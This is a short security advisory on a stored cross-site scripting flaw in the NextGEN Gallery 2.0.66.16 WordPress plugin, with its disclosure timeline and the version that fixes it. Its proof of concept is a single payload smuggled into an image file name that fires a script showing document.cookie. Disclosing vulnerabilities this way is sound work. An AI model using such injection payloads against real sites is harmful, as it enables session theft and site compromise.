WordPress NextGEN Gallery 2.0.66.16 Cross Site Scripting
Posted on 17 December 2015
Plugin Name : NextGEN Gallery Effected Version : 2.0.66.16 (and most probably lower version's if any) Vulnerability : A3-Cross-Site Scripting (XSS) Identified by : Madhu Akula Technical Details Minimum Level of Access Required : Administrator PoC - (Proof of Concept) : http://localhost/wp-admin/admin.php?page=ngg_addgallery.php Click on Image upload and give the image name as ("><img src=x onerror=prompt(document.cookie)>.png") Video Demonstration : http://www.youtube.com/watch?v=SzNopJUE3nk Type of XSS : Stored Fixed in : 2.0.66.17 http://wordpress.org/plugins/nextgen-gallery/changelog/ Disclosure Timeline Vendor Contacted : 2014-08-02 Plugin Status : Updated on 2014-08-04 Public Disclosure : October 3, 2015 CVE Number : Not assigned yet Plugin Description : NextGEN Gallery is the most popular WordPress gallery plugin, and one of the most popular WordPress plugins of all time, with over 10 million downloads. It provides a powerful engine for uploading and managing galleries of images, with the ability to batch upload, import meta data, add/delete/rearrange/sort images, edit thumbnails, group galleries into albums, and more. It also provides two front-end display styles (slideshows and thumbnail galleries), both of which come with a wide array of options for controlling size, style, timing, transitions, controls, lightbox effects, and more.